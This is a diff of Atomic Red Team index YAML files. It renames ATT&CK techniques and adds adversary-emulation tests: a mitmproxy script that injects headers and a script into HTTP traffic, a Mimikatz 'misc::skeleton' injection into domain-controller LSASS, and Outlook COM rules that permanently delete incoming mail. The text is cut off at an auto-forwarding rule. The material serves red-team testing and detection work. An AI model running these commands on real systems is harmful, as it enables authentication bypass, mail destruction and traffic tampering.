           #Write the decrypted eicar string to a file
-          $decryptedString | out-file T1027.013_decryptedEicar.txt
-        cleanup_command: Just delete the resulting T1027.013_decryptedEicar.txt file.
+          $decryptedString | Out-File $env:temp\T1027.013_decryptedEicar.txt
+        cleanup_command: Remove-Item $env:temp\T1027.013_decryptedEicar.txt -Force
+          -ErrorAction Ignore
         name: powershell
         elevation_required: false
     - name: Password-Protected ZIP Payload Extraction and Execution
@@ -13602,7 +13604,7 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -13632,6 +13634,7 @@ defense-evasion:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1027.006:
     technique:
@@ -26451,7 +26454,7 @@ execution:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-04-15T19:58:28.694Z'
-      name: Systemctl
+      name: 'System Services: Systemctl'
       description: "Adversaries may abuse systemctl to execute commands or programs.
         Systemctl is the primary interface for systemd, the Linux init system and
         service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -26474,6 +26477,7 @@ execution:
       - Linux
       x_mitre_version: '1.0'
       x_mitre_remote_support: false
+      identifier: T1569.003
     atomic_tests: []
   T1059.009:
     technique:
@@ -30888,7 +30892,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:48:41.026Z'
-      name: Outlook Rules
+      name: 'Office Application Startup: Outlook Rules'
       description: |-
         Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
 
@@ -30909,6 +30913,7 @@ persistence:
       - Windows
       - Office Suite
       x_mitre_version: '1.2'
+      identifier: T1137.005
     atomic_tests: []
   T1098.007:
     technique:
@@ -36470,7 +36475,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -36500,6 +36505,7 @@ persistence:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1556.005:
     technique:
@@ -38454,7 +38460,7 @@ command-and-control:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:48:25.458Z'
-      name: Domain Generation Algorithms
+      name: 'Dynamic Resolution: Domain Generation Algorithms'
       description: |-
         Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
 
@@ -38481,6 +38487,7 @@ command-and-control:
       - Windows
       - ESXi
       x_mitre_version: '1.2'
+      identifier: T1568.002
     atomic_tests: []
   T1071.004:
     technique:
@@ -38882,7 +38889,68 @@ command-and-control:
       - macOS
       - Windows
       x_mitre_version: '1.0'
-    atomic_tests: []
+      identifier: T1659
+    atomic_tests:
+    - name: MITM Proxy Injection
+      auto_generated_guid: 9b360eaf-c778-4f07-a6e7-895c4f01ac1c
+      description: Start mitmdump and verify injected header and HTML content.
+      supported_platforms:
+      - macos
+      - linux
+      dependencies:
+      - description: python3 must be installed
+        prereq_command: 'command -v python3
+
+          '
+        get_prereq_command: 'brew install python3 || (sudo apt-get update && sudo
+          apt-get install -y python3) || sudo yum install -y python3
+
+          '
+      - description: curl must be installed
+        prereq_command: 'command -v curl
+
+          '
+        get_prereq_command: 'brew install curl || (sudo apt-get update && sudo apt-get
+          install -y curl) || sudo yum install -y curl
+
+          '
+      - description: pipx must be installed
+        prereq_command: 'pipx --version
+
+          '
+        get_prereq_command: 'brew install pipx || (sudo apt-get update && sudo apt-get
+          install -y pipx) || sudo yum install -y pipx
+
+          '
+      - description: mitmproxy must be installed
+        prereq_command: 'pipx list | grep mitmproxy
+
+          '
+        get_prereq_command: 'pipx install mitmproxy || brew install mitmproxy
+
+          '
+      - description: mitmdump must be running on port 8080
+        prereq_command: 'lsof -i tcp:8080 | grep mitmdump
+
+          '
+        get_prereq_command: |
+          printf "from mitmproxy import http\ndef response(flow: http.HTTPFlow):\n    if 'text/html' in flow.response.headers.get('content-type',''):\n        flow.response.headers['X-Atomic']='T1659'\n        flow.response.text = flow.response.text.replace('</body>', '<script>alert(\"Atomic T1659 Injection\")</script></body>')" > /tmp/atomic_t1659_inject.py
+          ($HOME/.local/bin/mitmdump -s /tmp/atomic_t1659_inject.py -p 8080 > /tmp/atomic_t1659.log 2>&1 &)
+          sleep 5
+          lsof -i tcp:8080 | grep mitmdump || (cat /tmp/atomic_t1659.log; exit 1)
+      executor:
+        name: bash
+        command: |
+          curl -skI --proxy http://127.0.0.1:8080 http://example.com > /tmp/curl_out.txt
+          grep "X-Atomic" /tmp/curl_out.txt || (cat /tmp/curl_out.txt && exit 1)
+          curl -sk --proxy http://127.0.0.1:8080 http://example.com > /tmp/atomic_t1659_page.html
+          grep -q "Atomic T1659 Injection" /tmp/atomic_t1659_page.html || (head -20 /tmp/atomic_t1659_page.html; exit 1)
+        cleanup_command: |
+          rm -rf /tmp/atomic_t1659_inject.py
+          rm -rf /tmp/atomic_t1659.log
+          rm -rf /tmp/curl_out.txt
+          rm -rf /tmp/atomic_t1659_page.html
+          pkill -f mitmdump || true
   T1205:
     technique:
       type: attack-pattern
@@ -50459,7 +50527,7 @@ credential-access:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -50489,6 +50557,7 @@ credential-access:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1556.005:
     technique:
@@ -63506,7 +63575,68 @@ initial-access:
       - macOS
       - Windows
       x_mitre_version: '1.0'
-    atomic_tests: []
+      identifier: T1659
+    atomic_tests:
+    - name: MITM Proxy Injection
+      auto_generated_guid: 9b360eaf-c778-4f07-a6e7-895c4f01ac1c
+      description: Start mitmdump and verify injected header and HTML content.
+      supported_platforms:
+      - macos
+      - linux
+      dependencies:
+      - description: python3 must be installed
+        prereq_command: 'command -v python3
+
+          '
+        get_prereq_command: 'brew install python3 || (sudo apt-get update && sudo
+          apt-get install -y python3) || sudo yum install -y python3
+
+          '
+      - description: curl must be installed
+        prereq_command: 'command -v curl
+
+          '
+        get_prereq_command: 'brew install curl || (sudo apt-get update && sudo apt-get
+          install -y curl) || sudo yum install -y curl
+
+          '
+      - description: pipx must be installed
+        prereq_command: 'pipx --version
+
+          '
+        get_prereq_command: 'brew install pipx || (sudo apt-get update && sudo apt-get
+          install -y pipx) || sudo yum install -y pipx
+
+          '
+      - description: mitmproxy must be installed
+        prereq_command: 'pipx list | grep mitmproxy
+
+          '
+        get_prereq_command: 'pipx install mitmproxy || brew install mitmproxy
+
+          '
+      - description: mitmdump must be running on port 8080
+        prereq_command: 'lsof -i tcp:8080 | grep mitmdump
+
+          '
+        get_prereq_command: |
+          printf "from mitmproxy import http\ndef response(flow: http.HTTPFlow):\n    if 'text/html' in flow.response.headers.get('content-type',''):\n        flow.response.headers['X-Atomic']='T1659'\n        flow.response.text = flow.response.text.replace('</body>', '<script>alert(\"Atomic T1659 Injection\")</script></body>')" > /tmp/atomic_t1659_inject.py
+          ($HOME/.local/bin/mitmdump -s /tmp/atomic_t1659_inject.py -p 8080 > /tmp/atomic_t1659.log 2>&1 &)
+          sleep 5
+          lsof -i tcp:8080 | grep mitmdump || (cat /tmp/atomic_t1659.log; exit 1)
+      executor:
+        name: bash
+        command: |
+          curl -skI --proxy http://127.0.0.1:8080 http://example.com > /tmp/curl_out.txt
+          grep "X-Atomic" /tmp/curl_out.txt || (cat /tmp/curl_out.txt && exit 1)
+          curl -sk --proxy http://127.0.0.1:8080 http://example.com > /tmp/atomic_t1659_page.html
+          grep -q "Atomic T1659 Injection" /tmp/atomic_t1659_page.html || (head -20 /tmp/atomic_t1659_page.html; exit 1)
+        cleanup_command: |
+          rm -rf /tmp/atomic_t1659_inject.py
+          rm -rf /tmp/atomic_t1659.log
+          rm -rf /tmp/curl_out.txt
+          rm -rf /tmp/atomic_t1659_page.html
+          pkill -f mitmdump || true
   T1078.001:
     technique:
       type: attack-pattern

atomics/Indexes/office-365-index.yaml

@@ -11651,7 +11651,7 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -11681,6 +11681,7 @@ defense-evasion:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1027.006:
     technique:
@@ -23177,7 +23178,7 @@ execution:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-04-15T19:58:28.694Z'
-      name: Systemctl
+      name: 'System Services: Systemctl'
       description: "Adversaries may abuse systemctl to execute commands or programs.
         Systemctl is the primary interface for systemd, the Linux init system and
         service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -23200,6 +23201,7 @@ execution:
       - Linux
       x_mitre_version: '1.0'
       x_mitre_remote_support: false
+      identifier: T1569.003
     atomic_tests: []
   T1059.009:
     technique:
@@ -27384,7 +27386,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:48:41.026Z'
-      name: Outlook Rules
+      name: 'Office Application Startup: Outlook Rules'
       description: |-
         Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
 
@@ -27405,6 +27407,7 @@ persistence:
       - Windows
       - Office Suite
       x_mitre_version: '1.2'
+      identifier: T1137.005
     atomic_tests: []
   T1098.007:
     technique:
@@ -32249,7 +32252,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -32279,6 +32282,7 @@ persistence:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1556.005:
     technique:
@@ -34100,7 +34104,7 @@ command-and-control:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:48:25.458Z'
-      name: Domain Generation Algorithms
+      name: 'Dynamic Resolution: Domain Generation Algorithms'
       description: |-
         Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
 
@@ -34127,6 +34131,7 @@ command-and-control:
       - Windows
       - ESXi
       x_mitre_version: '1.2'
+      identifier: T1568.002
     atomic_tests: []
   T1071.004:
     technique:
@@ -34528,6 +34533,7 @@ command-and-control:
       - macOS
       - Windows
       x_mitre_version: '1.0'
+      identifier: T1659
     atomic_tests: []
   T1205:
     technique:
@@ -44567,7 +44573,7 @@ credential-access:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -44597,6 +44603,7 @@ credential-access:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1556.005:
     technique:
@@ -56310,6 +56317,7 @@ initial-access:
       - macOS
       - Windows
       x_mitre_version: '1.0'
+      identifier: T1659
     atomic_tests: []
   T1078.001:
     technique:

atomics/Indexes/saas-index.yaml

@@ -11470,7 +11470,7 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -11500,6 +11500,7 @@ defense-evasion:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1027.006:
     technique:
@@ -22945,7 +22946,7 @@ execution:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-04-15T19:58:28.694Z'
-      name: Systemctl
+      name: 'System Services: Systemctl'
       description: "Adversaries may abuse systemctl to execute commands or programs.
         Systemctl is the primary interface for systemd, the Linux init system and
         service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -22968,6 +22969,7 @@ execution:
       - Linux
       x_mitre_version: '1.0'
       x_mitre_remote_support: false
+      identifier: T1569.003
     atomic_tests: []
   T1059.009:
     technique:
@@ -27152,7 +27154,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:48:41.026Z'
-      name: Outlook Rules
+      name: 'Office Application Startup: Outlook Rules'
       description: |-
         Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
 
@@ -27173,6 +27175,7 @@ persistence:
       - Windows
       - Office Suite
       x_mitre_version: '1.2'
+      identifier: T1137.005
     atomic_tests: []
   T1098.007:
     technique:
@@ -32017,7 +32020,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -32047,6 +32050,7 @@ persistence:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1556.005:
     technique:
@@ -33817,7 +33821,7 @@ command-and-control:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:48:25.458Z'
-      name: Domain Generation Algorithms
+      name: 'Dynamic Resolution: Domain Generation Algorithms'
       description: |-
         Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
 
@@ -33844,6 +33848,7 @@ command-and-control:
       - Windows
       - ESXi
       x_mitre_version: '1.2'
+      identifier: T1568.002
     atomic_tests: []
   T1071.004:
     technique:
@@ -34245,6 +34250,7 @@ command-and-control:
       - macOS
       - Windows
       x_mitre_version: '1.0'
+      identifier: T1659
     atomic_tests: []
   T1205:
     technique:
@@ -44146,7 +44152,7 @@ credential-access:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -44176,6 +44182,7 @@ credential-access:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1556.005:
     technique:
@@ -55889,6 +55896,7 @@ initial-access:
       - macOS
       - Windows
       x_mitre_version: '1.0'
+      identifier: T1659
     atomic_tests: []
   T1078.001:
     technique:

atomics/Indexes/windows-index.yaml

@@ -1524,8 +1524,9 @@ defense-evasion:
           $bytes = [System.Convert]::FromBase64String($encodedString)
           $decodedString = [System.Text.Encoding]::UTF8.GetString($bytes)
           #write the decoded eicar string to file
-          $decodedString | Out-File T1027.013_decodedEicar.txt
-        cleanup_command: Just delete the resulting T1027.013_decodedEicar.txt file.
+          $decodedString | Out-File $env:temp\T1027.013_decodedEicar.txt
+        cleanup_command: Remove-Item $env:temp\T1027.013_decodedEicar.txt -Force -ErrorAction
+          Ignore
         name: powershell
         elevation_required: false
     - name: Decrypt Eicar File and Write to File
@@ -1543,8 +1544,9 @@ defense-evasion:
           $decrypt = ConvertTo-SecureString -String $encryptedString -Key $key
           $decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt))
           #Write the decrypted eicar string to a file
-          $decryptedString | out-file T1027.013_decryptedEicar.txt
-        cleanup_command: Just delete the resulting T1027.013_decryptedEicar.txt file.
+          $decryptedString | Out-File $env:temp\T1027.013_decryptedEicar.txt
+        cleanup_command: Remove-Item $env:temp\T1027.013_decryptedEicar.txt -Force
+          -ErrorAction Ignore
         name: powershell
         elevation_required: false
   T1014:
@@ -22923,7 +22925,7 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -22953,7 +22955,54 @@ defense-evasion:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
-    atomic_tests: []
+      identifier: T1556.001
+    atomic_tests:
+    - name: Skeleton Key via Mimikatz
+      auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
+      description: |
+        Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
+        user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
+
+        This test must be run on an isolated domain controller and must not be performed on a production DC.
+        Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
+      supported_platforms:
+      - windows
+      input_arguments:
+        mimikatz_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
+          description: Path to the mimikatz executable
+        file_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
+          description: File path where the zipped mimikatz file is downloaded to
+        mimikatz_url:
+          type: url
+          default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
+          description: The URL for the mimikatz release zip
+        directory_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz
+          description: Directory path for mimikatz
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Mimikatz must be present on the host machine at
+        prereq_command: 'if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
+          Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
+      executor:
+        command: '& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
+
+          '
+        cleanup_command: |
+          Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
+          Restart-Computer -Force
+        name: powershell
+        elevation_required: true
   T1027.006:
     technique:
       type: attack-pattern
@@ -42919,7 +42968,7 @@ execution:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-04-15T19:58:28.694Z'
-      name: Systemctl
+      name: 'System Services: Systemctl'
       description: "Adversaries may abuse systemctl to execute commands or programs.
         Systemctl is the primary interface for systemd, the Linux init system and
         service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -42942,6 +42991,7 @@ execution:
       - Linux
       x_mitre_version: '1.0'
       x_mitre_remote_support: false
+      identifier: T1569.003
     atomic_tests: []
   T1059.009:
     technique:
@@ -50133,7 +50183,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:48:41.026Z'
-      name: Outlook Rules
+      name: 'Office Application Startup: Outlook Rules'
       description: |-
         Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
 
@@ -50154,7 +50204,410 @@ persistence:
       - Windows
       - Office Suite
       x_mitre_version: '1.2'
-    atomic_tests: []
+      identifier: T1137.005
+    atomic_tests:
+    - name: Outlook Rule - Subject Trigger with DeletePermanently Action via COM Object
+      auto_generated_guid: ffadc988-b682-4a68-bd7e-4803666be637
+      description: |
+        Creates a malicious Outlook rule via the COM object that permanently deletes
+        emails when an email with a specific subject keyword arrives. Simulates
+        adversary persistence via Outlook Rules (T1137.005). Uses DeletePermanently
+        action as it does not require a resolved Exchange folder unlike MoveToFolder.
+        NOTE: olRuleActionStartApplication cannot be created programmatically per
+        Microsoft's Rules object model - DeletePermanently is used as the supported
+        equivalent that generates the same rule-creation artefact.
+        NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
+        session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+      supported_platforms:
+      - windows
+      input_arguments:
+        rule_name:
+          description: Name for the malicious Outlook rule
+          type: string
+          default: AtomicTest_T1137005_SubjectTrigger
+        trigger_subject:
+          description: Email subject keyword that triggers the rule
+          type: string
+          default: atomic-rt-trigger
+      dependencies:
+      - description: Classic Outlook must be installed (required for COM automation)
+        prereq_command: |
+          $clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+          if ($clsid) { exit 0 } else { exit 1 }
+        get_prereq_command: |
+          Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+          Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+          Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+          exit 1
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+              Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+              exit 1
+          }
+
+          $outlook   = New-Object -ComObject Outlook.Application
+          $namespace = $outlook.GetNamespace("MAPI")
+          $rules     = $namespace.DefaultStore.GetRules()
+          $rule      = $rules.Create("#{rule_name}", 0)
+
+          $cond = $rule.Conditions.Subject
+          $cond.Enabled = $true
+          $cond.Text    = @("#{trigger_subject}")
+
+          $action         = $rule.Actions.DeletePermanently
+          $action.Enabled = $true
+
+          $rule.Enabled = $true
+          $rules.Save()
+          Write-Host "[+] Rule '#{rule_name}' created. Emails with subject '#{trigger_subject}' will be permanently deleted."
+        cleanup_command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
+              exit 1
+          }
+          $outlook   = New-Object -ComObject Outlook.Application
+          $namespace = $outlook.GetNamespace("MAPI")
+          $rules     = $namespace.DefaultStore.GetRules()
+          $removed   = $false
+          for ($i = $rules.Count; $i -ge 1; $i--) {
+              if ($rules.Item($i).Name -eq "#{rule_name}") {
+                  $rules.Remove($rules.Item($i).Name)
+                  $removed = $true
+              }
+          }
+          if ($removed) {
+              $rules.Save()
+              Write-Host "[+] All instances of rule '#{rule_name}' removed."
+          } else {
+              Write-Host "[*] Rule '#{rule_name}' not found - already removed."
+          }
+    - name: Outlook Rule - Sender Address Trigger with DeletePermanently Action via
+        COM Object
+      auto_generated_guid: bddfd8d4-7687-4971-b611-50a537ab3ab4
+      description: |
+        Creates an Outlook rule via COM that permanently deletes emails received
+        from a specific sender address. Adversaries use sender-based triggers to
+        make rules appear more legitimate (e.g. disguised as a filter for a
+        specific colleague). Tests a different rule condition path through the
+        COM object model. Uses DeletePermanently as it does not require a resolved
+        Exchange folder unlike MoveToFolder.
+        NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
+        session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+      supported_platforms:
+      - windows
+      input_arguments:
+        rule_name:
+          description: Name for the malicious Outlook rule
+          type: string
+          default: AtomicTest_T1137005_SenderTrigger
+        trigger_sender:
+          description: Sender email address that triggers the rule
+          type: string
+          default: atomictest@redteam.local
+      dependencies:
+      - description: Classic Outlook must be installed (required for COM automation)
+        prereq_command: |
+          $clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+          if ($clsid) { exit 0 } else { exit 1 }
+        get_prereq_command: |
+          Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+          Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+          Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+          exit 1
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+              Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+              exit 1
+          }
+
+          $outlook   = New-Object -ComObject Outlook.Application
+          $namespace = $outlook.GetNamespace("MAPI")
+          $rules     = $namespace.DefaultStore.GetRules()
+          $rule      = $rules.Create("#{rule_name}", 0)
+
+          $cond = $rule.Conditions.From
+          $cond.Enabled = $true
+          $cond.Recipients.Add("#{trigger_sender}")
+          $cond.Recipients.ResolveAll() | Out-Null
+
+          $action         = $rule.Actions.DeletePermanently
+          $action.Enabled = $true
+
+          $rule.Enabled = $true
+          $rules.Save()
+          Write-Host "[+] Sender-based rule '#{rule_name}' created. Emails from '#{trigger_sender}' will be permanently deleted."
+        cleanup_command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
+              exit 1
+          }
+          $outlook   = New-Object -ComObject Outlook.Application
+          $namespace = $outlook.GetNamespace("MAPI")
+          $rules     = $namespace.DefaultStore.GetRules()
+          $removed   = $false
+          for ($i = $rules.Count; $i -ge 1; $i--) {
+              if ($rules.Item($i).Name -eq "#{rule_name}") {
+                  $rules.Remove($rules.Item($i).Name)
+                  $removed = $true
+              }
+          }
+          if ($removed) {
+              $rules.Save()
+              Write-Host "[+] All instances of rule '#{rule_name}' removed."
+          } else {
+              Write-Host "[*] Rule '#{rule_name}' not found - already removed."
+          }
+    - name: Outlook Rule - Auto-Forward Emails to External Address via COM Object
+      auto_generated_guid: b0bd3d76-a57c-4699-83f4-8cd798dd09bd
+      description: |
+        Creates an Outlook rule that automatically forwards all received emails to
+        an external address. Simulates Business Email Compromise (BEC) and insider
